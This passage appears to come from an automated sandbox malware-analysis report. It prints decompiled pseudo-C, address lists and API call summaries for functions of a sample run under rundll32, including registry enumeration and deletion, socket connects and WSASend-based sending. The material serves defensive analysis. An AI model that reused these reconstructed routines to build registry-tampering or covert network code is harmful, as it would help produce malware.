                                                                                              • RegDeleteValueW.ADVAPI32(00000000,00000000,?,?,?,00000000,00000103,?), ref: 04260B35
                                                                                              • RegDeleteValueW.ADVAPI32(00000000,00000000,?,?,?,00000000,00000103,?), ref: 04260B48
                                                                                              • RegCloseKey.ADVAPI32(00000000,?,?,00000000,00000103,?), ref: 04260B57
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Value$Query$Delete$CloseOpen
                                                                                              • String ID:
                                                                                              • API String ID: 2816288289-0
                                                                                              • Opcode ID: 2aef2e4ff32383f9548e6d94ff7e35e07af177b2761b1476a3da1a9e8de02cfd
                                                                                              • Instruction ID: 140441c652ec41bef6394a0b0e0a8125d8615d9701629b6b00c82d8668e64f05
                                                                                              • Opcode Fuzzy Hash: 2aef2e4ff32383f9548e6d94ff7e35e07af177b2761b1476a3da1a9e8de02cfd
                                                                                              • Instruction Fuzzy Hash: 30312DB1B00109BBEF20DFA5ED49FAEBB7DEB44644F104054F90AE2010E731AF95AA60
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 16%
                                                                                              			E0426F0B0(void* __eax, intOrPtr* __ecx, intOrPtr _a4, intOrPtr _a8) {
                                                                                              				intOrPtr _t14;
                                                                                              				long _t19;
                                                                                              				intOrPtr _t21;
                                                                                              				intOrPtr* _t31;
                                                                                              
                                                                                              				_t31 = __ecx;
                                                                                              				if(_a8 == 0) {
                                                                                              					_t14 = _a4;
                                                                                              					_t24 =  !=  ? 0x1c : 0x10;
                                                                                              					__imp__#4( *((intOrPtr*)(__ecx + 0x1c)), _t14,  !=  ? 0x1c : 0x10);
                                                                                              					if(_t14 == 0xffffffff) {
                                                                                              						goto L10;
                                                                                              					} else {
                                                                                              						__imp__WSAEventSelect( *((intOrPtr*)(__ecx + 0x1c)),  *((intOrPtr*)(__ecx + 0x20)), 0x23);
                                                                                              						if(_t14 == 0xffffffff) {
                                                                                              							goto L10;
                                                                                              						} else {
                                                                                              							 *((intOrPtr*)(__ecx + 0x4c)) = 1;
                                                                                              							 *((intOrPtr*)(__ecx + 0x50)) = 1;
                                                                                              							SetLastError(0);
                                                                                              							if( *((intOrPtr*)( *_t31 + 0x7c))() != 2) {
                                                                                              								goto L5;
                                                                                              							} else {
                                                                                              								_t19 = GetLastError();
                                                                                              								_t20 =  ==  ? 0x4c7 : _t19;
                                                                                              								__imp__#112( ==  ? 0x4c7 : _t19);
                                                                                              								goto L10;
                                                                                              							}
                                                                                              						}
                                                                                              					}
                                                                                              				} else {
                                                                                              					__imp__WSAEventSelect( *((intOrPtr*)(__ecx + 0x1c)),  *((intOrPtr*)(__ecx + 0x20)), 0x30);
                                                                                              					if(__eax == 0xffffffff) {
                                                                                              						L10:
                                                                                              						return 0;
                                                                                              					} else {
                                                                                              						_t21 = _a4;
                                                                                              						_t28 =  !=  ? 0x1c : 0x10;
                                                                                              						__imp__#4( *((intOrPtr*)(__ecx + 0x1c)), _t21,  !=  ? 0x1c : 0x10);
                                                                                              						if(_t21 == 0) {
                                                                                              							L5:
                                                                                              							return 1;
                                                                                              						} else {
                                                                                              							if(_t21 != 0xffffffff) {
                                                                                              								goto L10;
                                                                                              							} else {
                                                                                              								__imp__#111();
                                                                                              								if(_t21 != 0x2733) {
                                                                                              									goto L10;
                                                                                              								} else {
                                                                                              									goto L5;
                                                                                              								}
                                                                                              							}
                                                                                              						}
                                                                                              					}
                                                                                              				}
                                                                                              			}







                                                                                              0x0426f0b8
                                                                                              0x0426f0ba
                                                                                              0x0426f116
                                                                                              0x0426f127
                                                                                              0x0426f12f
                                                                                              0x0426f138
                                                                                              0x00000000
                                                                                              0x0426f13a
                                                                                              0x0426f142
                                                                                              0x0426f14b
                                                                                              0x00000000
                                                                                              0x0426f14d
                                                                                              0x0426f14d
                                                                                              0x0426f156
                                                                                              0x0426f15d
                                                                                              0x0426f16d
                                                                                              0x00000000
                                                                                              0x0426f16f
                                                                                              0x0426f16f
                                                                                              0x0426f17c
                                                                                              0x0426f180
                                                                                              0x00000000
                                                                                              0x0426f180
                                                                                              0x0426f16d
                                                                                              0x0426f14b
                                                                                              0x0426f0bc
                                                                                              0x0426f0c4
                                                                                              0x0426f0cd
                                                                                              0x0426f186
                                                                                              0x0426f18a
                                                                                              0x0426f0d3
                                                                                              0x0426f0d3
                                                                                              0x0426f0e4
                                                                                              0x0426f0ec
                                                                                              0x0426f0f4
                                                                                              0x0426f10c
                                                                                              0x0426f113
                                                                                              0x0426f0f6
                                                                                              0x0426f0f9
                                                                                              0x00000000
                                                                                              0x0426f0ff
                                                                                              0x0426f0ff
                                                                                              0x0426f10a
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0426f10a
                                                                                              0x0426f0f9
                                                                                              0x0426f0f4
                                                                                              0x0426f0cd

                                                                                              APIs
                                                                                              • WSAEventSelect.WS2_32(?,?,00000030), ref: 0426F0C4
                                                                                              • connect.WS2_32(?,?,00000010), ref: 0426F0EC
                                                                                              • WSAGetLastError.WS2_32 ref: 0426F0FF
                                                                                              • connect.WS2_32(?,?,00000010), ref: 0426F12F
                                                                                              • WSAEventSelect.WS2_32(?,?,00000023), ref: 0426F142
                                                                                              • SetLastError.KERNEL32(00000000), ref: 0426F15D
                                                                                              • GetLastError.KERNEL32 ref: 0426F16F
                                                                                              • WSASetLastError.WS2_32(00000000), ref: 0426F180
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$EventSelectconnect
                                                                                              • String ID:
                                                                                              • API String ID: 371153081-0
                                                                                              • Opcode ID: f6439cc65d190ce901daba63649a391540385fb40259d1e61fa1e63419647316
                                                                                              • Instruction ID: 8d31e4929bba2488b8cbe8696ba7fc25d5b3600bf72072b2794b1a7a17fef64c
                                                                                              • Opcode Fuzzy Hash: f6439cc65d190ce901daba63649a391540385fb40259d1e61fa1e63419647316
                                                                                              • Instruction Fuzzy Hash: 9F218B30320604AFEB246F68F90CB6A77B5EB05361F208628F566C75D0DB79EC928F50
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 82%
                                                                                              			E04261680(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8) {
                                                                                              				signed int _v8;
                                                                                              				short _v528;
                                                                                              				short* _v532;
                                                                                              				short* _v536;
                                                                                              				short* _v540;
                                                                                              				void* _v544;
                                                                                              				int _v548;
                                                                                              				int _v552;
                                                                                              				void* _v556;
                                                                                              				short* _v560;
                                                                                              				intOrPtr _v564;
                                                                                              				signed int _t61;
                                                                                              				short* _t64;
                                                                                              				short* _t73;
                                                                                              				int* _t83;
                                                                                              				intOrPtr* _t84;
                                                                                              				void* _t102;
                                                                                              				int _t103;
                                                                                              				void** _t105;
                                                                                              				short** _t110;
                                                                                              				intOrPtr _t113;
                                                                                              				void* _t117;
                                                                                              				short* _t120;
                                                                                              				short* _t121;
                                                                                              				void* _t122;
                                                                                              				short* _t125;
                                                                                              				short* _t126;
                                                                                              				void* _t128;
                                                                                              				intOrPtr* _t129;
                                                                                              				intOrPtr _t131;
                                                                                              				short* _t132;
                                                                                              				void* _t134;
                                                                                              				signed int _t137;
                                                                                              				void* _t138;
                                                                                              				void* _t139;
                                                                                              
                                                                                              				_t61 =  *0x42a4008; // 0xd33db39d
                                                                                              				_v8 = _t61 ^ _t137;
                                                                                              				_t131 = _a8;
                                                                                              				_t119 = _a4;
                                                                                              				_v564 = __ecx;
                                                                                              				_v532 = 0;
                                                                                              				_t105 = _a4 + 1;
                                                                                              				_t64 = _t131 - 1 + _t105;
                                                                                              				_v536 = _t105;
                                                                                              				_v540 = _t64;
                                                                                              				if(_t64 - _t105 >= 4) {
                                                                                              					_t102 =  *_t105;
                                                                                              					_v536 =  &(_t105[1]);
                                                                                              				} else {
                                                                                              					_v532 = 1;
                                                                                              					_t102 = 0;
                                                                                              				}
                                                                                              				_v560 = E04260D20( &_v540);
                                                                                              				if(_v532 != 0) {
                                                                                              					L20:
                                                                                              					return E04275AFE(_v8 ^ _t137);
                                                                                              				} else {
                                                                                              					_t110 =  &_v540;
                                                                                              					_v548 = 0;
                                                                                              					_v532 = 0;
                                                                                              					_v540 = 0;
                                                                                              					_v536 = 0;
                                                                                              					E0425B9C0(_t110, _t131);
                                                                                              					_t120 = _v536;
                                                                                              					E0427E060(_t120, _t119, _t131);
                                                                                              					_t139 = _t138 + 0xc;
                                                                                              					_t121 = _t120 + _t131;
                                                                                              					_v536 = _t121;
                                                                                              					if(RegOpenKeyExW(_t102, _v560, 0, 0x20119,  &_v544) != 0) {
                                                                                              						L13:
                                                                                              						_t72 = _v560;
                                                                                              						if(_v560 != 0) {
                                                                                              							E04275B0F(_t72);
                                                                                              							_t139 = _t139 + 4;
                                                                                              						}
                                                                                              						_t132 = _v540;
                                                                                              						if(_t132 != 0) {
                                                                                              							_t122 = _t121 - _t132;
                                                                                              							_t73 = _t132;
                                                                                              						} else {
                                                                                              							_t122 = 0;
                                                                                              							_t73 = 0;
                                                                                              						}
                                                                                              						_push(_t110);
                                                                                              						_push(0x3f);
                                                                                              						_push(_t122);
                                                                                              						_push(_t73);
                                                                                              						E04251C60( *((intOrPtr*)(_v564 + 4)));
                                                                                              						if(_t132 != 0) {
                                                                                              							E04275B0F(_t132);
                                                                                              						}
                                                                                              						goto L20;
                                                                                              					}
                                                                                              					_t103 = 0;
                                                                                              					_v552 = 0x104;
                                                                                              					if(RegEnumKeyExW(_v544, 0,  &_v528,  &_v552, 0, 0, 0, 0) != 0) {
                                                                                              						L12:
                                                                                              						RegCloseKey(_v544);
                                                                                              						goto L13;
                                                                                              					}
                                                                                              					asm("o16 nop [eax+eax]");
                                                                                              					do {
                                                                                              						_v548 = 0;
                                                                                              						_t103 = _t103 + 1;
                                                                                              						_t83 = RegOpenKeyExW(_v544,  &_v528, 0, 0x20119,  &_v556);
                                                                                              						if(_t83 == 0) {
                                                                                              							RegQueryInfoKeyW(_v556, 0, 0, 0,  &_v548, _t83, _t83, _t83, _t83, _t83, _t83, _t83);
                                                                                              							RegCloseKey(_v556);
                                                                                              						}
                                                                                              						_t84 =  &_v528;
                                                                                              						_t117 = _t84 + 2;
                                                                                              						do {
                                                                                              							_t113 =  *_t84;
                                                                                              							_t84 = _t84 + 2;
                                                                                              						} while (_t113 != 0);
                                                                                              						_t134 = 2 + (_t84 - _t117 >> 1) * 2;
                                                                                              						_t124 =  ==  ? 0 : _t121 - _v540;
                                                                                              						E0425B9C0( &_v540, ( ==  ? 0 : _t121 - _v540) + _t134);
                                                                                              						_t125 = _v536;
                                                                                              						E0427E060(_t125,  &_v528, _t134);
                                                                                              						_t126 = _t125 + _t134;
                                                                                              						_v536 = _t126;
                                                                                              						_t139 = _t139 + 0xc;
                                                                                              						_t128 =  ==  ? 0 : _t126 - _v540;
                                                                                              						_t110 =  &_v540;
                                                                                              						_t48 = _t128 + 4; // 0x4
                                                                                              						E0425B9C0(_t110, _t48);
                                                                                              						_t129 = _v536;
                                                                                              						 *_t129 = _v548;
                                                                                              						_t121 = _t129 + 4;
                                                                                              						_v552 = 0x104;
                                                                                              						_v536 = _t121;
                                                                                              					} while (RegEnumKeyExW(_v544, _t103,  &_v528,  &_v552, 0, 0, 0, 0) == 0);
                                                                                              					goto L12;
                                                                                              				}
                                                                                              			}






































                                                                                              0x04261689
                                                                                              0x04261690
                                                                                              0x04261695
                                                                                              0x04261699
                                                                                              0x0426169c
                                                                                              0x042616a5
                                                                                              0x042616af
                                                                                              0x042616b2
                                                                                              0x042616b4
                                                                                              0x042616ba
                                                                                              0x042616c5
                                                                                              0x042616d5
                                                                                              0x042616da
                                                                                              0x042616c7
                                                                                              0x042616c7
                                                                                              0x042616d1
                                                                                              0x042616d1
                                                                                              0x042616f2
                                                                                              0x042616f8
                                                                                              0x04261923
                                                                                              0x04261933
                                                                                              0x042616fe
                                                                                              0x042616ff
                                                                                              0x04261705
                                                                                              0x0426170f
                                                                                              0x04261719
                                                                                              0x04261723
                                                                                              0x0426172d
                                                                                              0x04261734
                                                                                              0x0426173b
                                                                                              0x04261740
                                                                                              0x04261749
                                                                                              0x0426174b
                                                                                              0x04261768
                                                                                              0x042618dc
                                                                                              0x042618dc
                                                                                              0x042618e4
                                                                                              0x042618e7
                                                                                              0x042618ec
                                                                                              0x042618ec
                                                                                              0x042618ef
                                                                                              0x042618f7
                                                                                              0x042618ff
                                                                                              0x04261901
                                                                                              0x042618f9
                                                                                              0x042618f9
                                                                                              0x042618fb
                                                                                              0x042618fb
                                                                                              0x04261903
                                                                                              0x0426190a
                                                                                              0x0426190c
                                                                                              0x0426190d
                                                                                              0x04261911
                                                                                              0x04261918
                                                                                              0x0426191b
                                                                                              0x04261920
                                                                                              0x00000000
                                                                                              0x04261918
                                                                                              0x0426176e
                                                                                              0x04261770
                                                                                              0x042617a1
                                                                                              0x042618d4
                                                                                              0x042618da
                                                                                              0x00000000
                                                                                              0x042618da
                                                                                              0x042617a7
                                                                                              0x042617b0
                                                                                              0x042617b6
                                                                                              0x042617ce
                                                                                              0x042617d6
                                                                                              0x042617de
                                                                                              0x042617fa
                                                                                              0x04261806
                                                                                              0x04261806
                                                                                              0x04261808
                                                                                              0x0426180e
                                                                                              0x04261811
                                                                                              0x04261811
                                                                                              0x04261814
                                                                                              0x04261817
                                                                                              0x04261822
                                                                                              0x04261833
                                                                                              0x04261840
                                                                                              0x04261845
                                                                                              0x04261854
                                                                                              0x0426185f
                                                                                              0x04261869
                                                                                              0x0426186f
                                                                                              0x04261876
                                                                                              0x04261879
                                                                                              0x0426187f
                                                                                              0x04261883
                                                                                              0x04261888
                                                                                              0x042618a3
                                                                                              0x042618ad
                                                                                              0x042618b0
                                                                                              0x042618ba
                                                                                              0x042618cc
                                                                                              0x00000000
                                                                                              0x042617b0

                                                                                              APIs
                                                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020119,?), ref: 04261760
                                                                                              • RegEnumKeyExW.ADVAPI32(?,00000000,?,00000104,00000000,00000000,00000000,00000000,?,?,00000000,00020119,?), ref: 04261793
                                                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020119,?,?,?,00000000,00020119,?), ref: 042617D6
                                                                                              • RegQueryInfoKeyW.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00020119), ref: 042617FA
                                                                                              • RegCloseKey.ADVAPI32(?,?,?,00000000,00020119,?), ref: 04261806
                                                                                              • RegEnumKeyExW.ADVAPI32(?,00000001,?,00000104,00000000,00000000,00000000,00000000,00000004,00000000,00020119,?), ref: 042618C0
                                                                                              • RegCloseKey.ADVAPI32(?,?,?,00000000,00020119,?), ref: 042618DA
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CloseEnumOpen$InfoQuery
                                                                                              • String ID:
                                                                                              • API String ID: 396531129-0
                                                                                              • Opcode ID: 14a2a694d020f6e8c7694a9943cf2d0efb87f413cacdef060ae8c56fb75edeeb
                                                                                              • Instruction ID: bb93f494da73520a44fc632d8ae3ca20f9723dae6053651abca7f9f51ce3477a
                                                                                              • Opcode Fuzzy Hash: 14a2a694d020f6e8c7694a9943cf2d0efb87f413cacdef060ae8c56fb75edeeb
                                                                                              • Instruction Fuzzy Hash: F27151B1A5122DABDB249F64DC88BEAB7B8EF54304F1001D5E509A7251DB70BF94CF90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 73%
                                                                                              			E0428ED7F(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
                                                                                              				signed int _v8;
                                                                                              				signed char _v15;
                                                                                              				char _v16;
                                                                                              				void _v24;
                                                                                              				short _v28;
                                                                                              				char _v31;
                                                                                              				void _v32;
                                                                                              				long _v36;
                                                                                              				intOrPtr _v40;
                                                                                              				void* _v44;
                                                                                              				signed int _v48;
                                                                                              				signed char* _v52;
                                                                                              				long _v56;
                                                                                              				int _v60;
                                                                                              				signed int _t78;
                                                                                              				signed int _t80;
                                                                                              				int _t86;
                                                                                              				void* _t94;
                                                                                              				long _t97;
                                                                                              				void _t105;
                                                                                              				void* _t112;
                                                                                              				signed int _t116;
                                                                                              				signed int _t118;
                                                                                              				signed char _t123;
                                                                                              				signed char _t128;
                                                                                              				intOrPtr _t129;
                                                                                              				signed int _t131;
                                                                                              				signed char* _t133;
                                                                                              				intOrPtr* _t135;
                                                                                              				signed int _t136;
                                                                                              				void* _t137;
                                                                                              
                                                                                              				_t78 =  *0x42a4008; // 0xd33db39d
                                                                                              				_v8 = _t78 ^ _t136;
                                                                                              				_t80 = _a8;
                                                                                              				_t118 = _t80 >> 6;
                                                                                              				_t116 = (_t80 & 0x0000003f) * 0x30;
                                                                                              				_t133 = _a12;
                                                                                              				_v52 = _t133;
                                                                                              				_v48 = _t118;
                                                                                              				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0x42a7680 + _t118 * 4)) + _t116 + 0x18));
                                                                                              				_v40 = _a16 + _t133;
                                                                                              				_t86 = GetConsoleCP();
                                                                                              				_t135 = _a4;
                                                                                              				_v60 = _t86;
                                                                                              				 *_t135 = 0;
                                                                                              				 *((intOrPtr*)(_t135 + 4)) = 0;
                                                                                              				 *((intOrPtr*)(_t135 + 8)) = 0;
                                                                                              				while(_t133 < _v40) {
                                                                                              					_v28 = 0;
                                                                                              					_v31 =  *_t133;
                                                                                              					_t129 =  *((intOrPtr*)(0x42a7680 + _v48 * 4));
                                                                                              					_t123 =  *(_t129 + _t116 + 0x2d);
                                                                                              					if((_t123 & 0x00000004) == 0) {
                                                                                              						if(( *(E0428982A(_t116, _t129) + ( *_t133 & 0x000000ff) * 2) & 0x00008000) == 0) {
                                                                                              							_push(1);
                                                                                              							_push(_t133);
                                                                                              							goto L8;
                                                                                              						} else {
                                                                                              							if(_t133 >= _v40) {
                                                                                              								_t131 = _v48;
                                                                                              								 *((char*)( *((intOrPtr*)(0x42a7680 + _t131 * 4)) + _t116 + 0x2e)) =  *_t133;
                                                                                              								 *( *((intOrPtr*)(0x42a7680 + _t131 * 4)) + _t116 + 0x2d) =  *( *((intOrPtr*)(0x42a7680 + _t131 * 4)) + _t116 + 0x2d) | 0x00000004;
                                                                                              								 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 4)) + 1;
                                                                                              							} else {
                                                                                              								_t112 = E0428AF6D( &_v28, _t133, 2);
                                                                                              								_t137 = _t137 + 0xc;
                                                                                              								if(_t112 != 0xffffffff) {
                                                                                              									_t133 =  &(_t133[1]);
                                                                                              									goto L9;
                                                                                              								}
                                                                                              							}
                                                                                              						}
                                                                                              					} else {
                                                                                              						_t128 = _t123 & 0x000000fb;
                                                                                              						_v16 =  *((intOrPtr*)(_t129 + _t116 + 0x2e));
                                                                                              						_push(2);
                                                                                              						_v15 = _t128;
                                                                                              						 *(_t129 + _t116 + 0x2d) = _t128;
                                                                                              						_push( &_v16);
                                                                                              						L8:
                                                                                              						_push( &_v28);
                                                                                              						_t94 = E0428AF6D();
                                                                                              						_t137 = _t137 + 0xc;
                                                                                              						if(_t94 != 0xffffffff) {
                                                                                              							L9:
                                                                                              							_t133 =  &(_t133[1]);
                                                                                              							_t97 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
                                                                                              							_v56 = _t97;
                                                                                              							if(_t97 != 0) {
                                                                                              								if(WriteFile(_v44,  &_v24, _t97,  &_v36, 0) == 0) {
                                                                                              									L19:
                                                                                              									 *_t135 = GetLastError();
                                                                                              								} else {
                                                                                              									 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 8)) - _v52 + _t133;
                                                                                              									if(_v36 >= _v56) {
                                                                                              										if(_v31 != 0xa) {
                                                                                              											goto L16;
                                                                                              										} else {
                                                                                              											_t105 = 0xd;
                                                                                              											_v32 = _t105;
                                                                                              											if(WriteFile(_v44,  &_v32, 1,  &_v36, 0) == 0) {
                                                                                              												goto L19;
                                                                                              											} else {
                                                                                              												if(_v36 >= 1) {
                                                                                              													 *((intOrPtr*)(_t135 + 8)) =  *((intOrPtr*)(_t135 + 8)) + 1;
                                                                                              													 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 4)) + 1;
                                                                                              													goto L16;
                                                                                              												}
                                                                                              											}
                                                                                              										}
                                                                                              									}
                                                                                              								}
                                                                                              							}
                                                                                              						}
                                                                                              					}
                                                                                              					goto L20;
                                                                                              					L16:
                                                                                              				}
                                                                                              				L20:
                                                                                              				return E04275AFE(_v8 ^ _t136);
                                                                                              			}


































                                                                                              0x0428ed87
                                                                                              0x0428ed8e
                                                                                              0x0428ed91
                                                                                              0x0428ed99
                                                                                              0x0428ed9d
                                                                                              0x0428eda9
                                                                                              0x0428edac
                                                                                              0x0428edaf
                                                                                              0x0428edb6
                                                                                              0x0428edbe
                                                                                              0x0428edc1
                                                                                              0x0428edc7
                                                                                              0x0428edcd
                                                                                              0x0428edd2
                                                                                              0x0428edd4
                                                                                              0x0428edd7
                                                                                              0x0428eddc
                                                                                              0x0428ede6
                                                                                              0x0428eded
                                                                                              0x0428edf0
                                                                                              0x0428edf7
                                                                                              0x0428edfe
                                                                                              0x0428ee2a
                                                                                              0x0428ee50
                                                                                              0x0428ee52
                                                                                              0x00000000
                                                                                              0x0428ee2c
                                                                                              0x0428ee2f
                                                                                              0x0428eef6
                                                                                              0x0428ef02
                                                                                              0x0428ef0d
                                                                                              0x0428ef12
                                                                                              0x0428ee35
                                                                                              0x0428ee3c
                                                                                              0x0428ee41
                                                                                              0x0428ee47
                                                                                              0x0428ee4d
                                                                                              0x00000000
                                                                                              0x0428ee4d
                                                                                              0x0428ee47
                                                                                              0x0428ee2f
                                                                                              0x0428ee00
                                                                                              0x0428ee04
                                                                                              0x0428ee07
                                                                                              0x0428ee0d
                                                                                              0x0428ee0f
                                                                                              0x0428ee12
                                                                                              0x0428ee16
                                                                                              0x0428ee53
                                                                                              0x0428ee56
                                                                                              0x0428ee57
                                                                                              0x0428ee5c
                                                                                              0x0428ee62
                                                                                              0x0428ee68
                                                                                              0x0428ee77
                                                                                              0x0428ee7d
                                                                                              0x0428ee83
                                                                                              0x0428ee88
                                                                                              0x0428eea4
                                                                                              0x0428ef17
                                                                                              0x0428ef1d
                                                                                              0x0428eea6
                                                                                              0x0428eeae
                                                                                              0x0428eeb7
                                                                                              0x0428eebd
                                                                                              0x00000000
                                                                                              0x0428eebf
                                                                                              0x0428eec1
                                                                                              0x0428eec4
                                                                                              0x0428eedd
                                                                                              0x00000000
                                                                                              0x0428eedf
                                                                                              0x0428eee3
                                                                                              0x0428eee5
                                                                                              0x0428eee8
                                                                                              0x00000000
                                                                                              0x0428eee8
                                                                                              0x0428eee3
                                                                                              0x0428eedd
                                                                                              0x0428eebd
                                                                                              0x0428eeb7
                                                                                              0x0428eea4
                                                                                              0x0428ee88
                                                                                              0x0428ee62
                                                                                              0x00000000
                                                                                              0x0428eeeb
                                                                                              0x0428eeeb
                                                                                              0x0428ef1f
                                                                                              0x0428ef31

                                                                                              APIs
                                                                                              • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,0428F4F4,?,00000000,?,00000000,00000000), ref: 0428EDC1
                                                                                              • __fassign.LIBCMT ref: 0428EE3C
                                                                                              • __fassign.LIBCMT ref: 0428EE57
                                                                                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 0428EE7D
                                                                                              • WriteFile.KERNEL32(?,?,00000000,0428F4F4,00000000,?,?,?,?,?,?,?,?,?,0428F4F4,?), ref: 0428EE9C
                                                                                              • WriteFile.KERNEL32(?,?,00000001,0428F4F4,00000000,?,?,?,?,?,?,?,?,?,0428F4F4,?), ref: 0428EED5
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                              • String ID:
                                                                                              • API String ID: 1324828854-0
                                                                                              • Opcode ID: d11311b55f5ba9010e1e38368d3318e4e1f477a4972d0e16cf4b919be859f850
                                                                                              • Instruction ID: f86e4a3a46c890af9e591fb74b75d880359871881d4e5827f4ab5813c41f58ba
                                                                                              • Opcode Fuzzy Hash: d11311b55f5ba9010e1e38368d3318e4e1f477a4972d0e16cf4b919be859f850
                                                                                              • Instruction Fuzzy Hash: E351F371F102099FDB10EFA8D884AEEBBF8EF19310F15451EE915E3281E770A941CB60
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 63%
                                                                                              			E04274580(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                              				signed int _v8;
                                                                                              				long _v12;
                                                                                              				void* _v16;
                                                                                              				intOrPtr _v20;
                                                                                              				intOrPtr _v24;
                                                                                              				intOrPtr _v28;
                                                                                              				void** _v32;
                                                                                              				signed int _t53;
                                                                                              				intOrPtr _t56;
                                                                                              				long _t61;
                                                                                              				long* _t68;
                                                                                              				long _t71;
                                                                                              				long _t87;
                                                                                              				intOrPtr _t90;
                                                                                              				void** _t100;
                                                                                              				void* _t101;
                                                                                              				long* _t104;
                                                                                              				void* _t106;
                                                                                              				void* _t108;
                                                                                              				signed int _t109;
                                                                                              				void* _t110;
                                                                                              
                                                                                              				_t90 = __ecx;
                                                                                              				_t53 =  *0x42a4008; // 0xd33db39d
                                                                                              				_v8 = _t53 ^ _t109;
                                                                                              				_v20 = _a8;
                                                                                              				_t56 = _a12;
                                                                                              				_v24 = __ecx;
                                                                                              				_v28 = _a4;
                                                                                              				if(_t56 <= 0) {
                                                                                              					return E04275AFE(_v8 ^ _t109);
                                                                                              				} else {
                                                                                              					_t100 = __ecx + 0x94;
                                                                                              					_v32 = _t100;
                                                                                              					do {
                                                                                              						_v16 = 0;
                                                                                              						_t87 =  <  ? _t56 :  *((intOrPtr*)(_t90 + 0x18));
                                                                                              						_v12 = _t87;
                                                                                              						if(E0426C880( &(_t100[7]),  &_v16) != 0) {
                                                                                              							_t101 = _v16;
                                                                                              						} else {
                                                                                              							_t108 = _t100[4];
                                                                                              							_t101 = RtlAllocateHeap( *_t100, 0, _t108 + 0x38);
                                                                                              							_v16 = _t101;
                                                                                              							 *(_t101 + 0x14) = _v32;
                                                                                              							_t20 = _t101 + 0x38; // 0x38
                                                                                              							 *(_t101 + 0x24) = _t108;
                                                                                              							 *((intOrPtr*)(_t101 + 0x20)) = _t20;
                                                                                              						}
                                                                                              						_t24 = _t101 + 0x1c; // 0x1c
                                                                                              						_t104 = _t24;
                                                                                              						asm("xorps xmm0, xmm0");
                                                                                              						asm("movups [edi], xmm0");
                                                                                              						 *(_t101 + 0x10) = 0;
                                                                                              						 *_t104 = 0;
                                                                                              						if(_t87 >= 0) {
                                                                                              							_t61 = _v12;
                                                                                              						} else {
                                                                                              							_t61 =  *(_v24 + 0x18);
                                                                                              						}
                                                                                              						 *_t104 = _t61;
                                                                                              						E0427E060( *((intOrPtr*)(_t101 + 0x20)), _v20, _t87);
                                                                                              						_t110 = _t110 + 0xc;
                                                                                              						InterlockedExchangeAdd(_v28 + 0x40, _t87);
                                                                                              						 *((intOrPtr*)(_t101 + 0x34)) =  *((intOrPtr*)(_v28 + 0x88));
                                                                                              						_t68 =  &_v12;
                                                                                              						_v12 = 0;
                                                                                              						 *((intOrPtr*)(_t101 + 0x18)) = 3;
                                                                                              						 *(_t101 + 0x28) = 2;
                                                                                              						__imp__WSASend( *((intOrPtr*)(_t101 + 0x34)), _t104, 1, _t68, 0, _t101, 0);
                                                                                              						if(_t68 != 0xffffffff) {
                                                                                              							_t68 = 0;
                                                                                              						} else {
                                                                                              							__imp__#111();
                                                                                              						}
                                                                                              						_t106 =  !=  ? _t68 : 0;
                                                                                              						_t40 = _t101 + 0x28; // 0x28
                                                                                              						if(InterlockedDecrement(_t40) == 0 || _t106 != 0) {
                                                                                              							_t71 = E0426C930(_v24 + 0xb0, _t101);
